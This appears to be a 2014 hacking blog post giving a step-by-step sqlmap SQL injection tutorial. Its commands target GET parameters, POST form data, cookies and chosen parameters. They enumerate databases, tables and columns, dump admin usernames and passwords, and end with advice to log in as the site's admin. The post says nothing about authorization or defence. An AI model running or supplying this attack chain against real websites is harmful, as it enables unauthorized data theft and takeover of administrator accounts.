how to use sqlmap on GET method
- fingerprinting
first you must have a vulnerable website for
the target, if you was have a target now open
sqlmap and type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 "
sqlmap will detect vulnerable of your target
and will tell you what the type of vulnerable
and what is the database type. and if your
target vulnerable go to next step.
- find database name
type this command to find database name
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " --dbs
on this step, sqlmap will find the database
name of your target, for example I use
"web_db" for the database name.
- find tables name
after sqlmap find the databse name its time
to find the tables name. use this command to
find the table name
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db --tables
there will show you some tables name inside
"web_db" database, ok for example I use
"tbl_admin" as the tables name.
- find columns name
its time to find what inside "tbl_admin" from
"web_db" and we call it columns. to find
columns type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db -T tbl_admin --
columns
it will show you the list of columns name,
for example I find "user" and "password"
columns.
- dump
this command will dumped data from the
columns, type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db -T tbl_admin -C
user,password --dump
and I find "user = admin" and "password =
adminpass". now go to the web and find the
admin login.
how to use sqlmap on POST method
its the same way with GET method, its just
that you have to insert POST data to the
sqlmap. for example I have vulnerable site
on the "login.php" path. the POST data is
"id=admin&pwd=password&submit=login".
how to find the POST data ? just use "Live
HTTPheaders" its a firefox add ons.
- fingerprinting
its same way with GET method, just type this
command
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
- find database name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--dbs
- find tables name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db --tables
- find columns name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db -T tbl_admin --columns
- dump
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db -T tbl_admin -C user,password --
dump
include cookie
still same method but you just should insert
the cookie
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " --
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
or
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
custom parameter
if you have a custom parameter to inject you
can type "-p" like this command
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
-p "pwd"
sqlmap will inject "pwd" parameter. or you
can give star"*" to the parameter to inject,
like this
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=*password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
cover
if you a windows users, dont use "./" to run
it on cmd.
Go To Download Software: http://sqlmap.org/
--from PH1K3!
Wednesday 30 July 2014
HACK WEBSITE USING SQLMAP SQL INJECTION TOOLS FULL TUTORIAL
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment